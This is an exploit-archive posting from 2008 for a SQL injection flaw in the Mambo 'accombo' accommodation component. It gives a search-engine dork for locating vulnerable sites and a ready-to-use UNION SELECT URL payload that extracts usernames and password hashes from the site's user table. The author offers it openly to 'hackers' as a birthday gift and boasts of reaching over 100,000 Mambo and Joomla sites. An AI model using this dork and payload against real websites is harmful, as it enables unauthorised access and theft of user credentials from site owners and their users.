[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component accombo 1.x (id) SQL Injection Vulnerability
# Published : 2008-03-19
# Author : S@BUN
# Previous Title : Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability
# Next Title : Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability
##########################################
#
# Mambo Component com_accombo SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MA?°L : hackturkiye.hackturkiye@gmail.com
#
############################################
TODAY MY B?°RTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLO?°TS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY
100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR
you can see all my exploits
http://my.opera.com/SQL-Injection/blog/
###########################################
#
# DORK 1 : allinurl: "com_accombo"
#
###########################################
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
side note:
<name>accombo</name>
<creationDate>29/02/2004</creationDate>
<author>Niall McCullagh</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>mambo@glenelly.net</authorEmail>
<authorUrl>mambo.glenelly.net</authorUrl>
<version>1.4</version>
<description>Accombo is a Mambo accommodation advertising component.</description>
# www.Syue.com [2008-03-19]